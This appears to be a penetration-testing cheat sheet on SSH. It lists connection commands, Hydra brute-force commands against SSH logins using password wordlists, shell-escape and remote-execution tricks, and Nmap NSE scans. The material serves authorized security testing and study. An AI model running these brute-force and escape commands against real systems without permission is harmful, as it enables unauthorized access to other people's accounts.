Introduction¶
SSH (Secure Shell) is a protocol for secure remote access and file transfer between systems. It encrypts all communications, protecting against eavesdropping and attacks. SSH uses a client-server model and supports both password and key-based authentication.
SSH Connection Management¶
Use the following commands to establish SSH connections.
Connection Type | Command | Description |
---|---|---|
Password Auth | ssh -p 22 [USERNAME]@[TARGET-IP] |
Connects to an SSH server using password. |
Private Key Auth | chmod 600 PATH/TO/PRIVATE-KEY then ssh -i PATH/TO/PRIVATE/KEY [USERNAME]@[TARGET-IP] |
Sets the correct permissions for a private key and uses it to establish an SSH connection. |
Brute-Forcing SSH Credentials¶
Hydra can be used to brute-force SSH logins under different scenarios:
Scenario | Command |
---|---|
Unknown User | hydra -L user.txt -p "Password" -f [TARGET-IP] ssh |
Unknown Password | hydra -l user -P /opt/rockyou.txt -f [TARGET-IP] ssh |
Unknown User and Password | hydra -L user.txt -P /opt/rockyou.txt -f [TARGET-IP] ssh |
Different Port | hydra -l user -P /opt/rockyou.txt -f [TARGET-IP] ssh -s 9999 |
Bypassing SSH Restrictions¶
Useful techniques for executing commands or scripts over SSH:
Scenario | Command |
---|---|
Escaping to Another Shell | sshpass -p '[PASSWORD]' ssh [USERNAME]@[TARGET-IP] -t bash |
Remote Command Execution | ssh [USERNAME]@[TARGET-IP] 'echo "[COMMAND-HERE]"' |
Execute Local Script Remotely | ssh [USERNAME]@[TARGET-IP] 'bash -s' < /path/to/local_script.sh |
Nmap NSE Scripts for SSH¶
Nmap NSE scripts specifically designed for SSH to discover vulnerabilities or gather information.
Task | Command | Description |
---|---|---|
Discovering SSH-related Scripts | ls /usr/share/nmap/scripts/ \| grep "ssh" |
Lists all Nmap NSE scripts related to SSH. This helps in selecting the appropriate scripts for targeted SSH testing. |
Run SSH NSE Scripts | nmap -p 22 --script ssh* [TARGET-IP] |
Executes SSH-related Nmap scripts against a target IP on port 22 for comprehensive vulnerability scanning and information gathering. |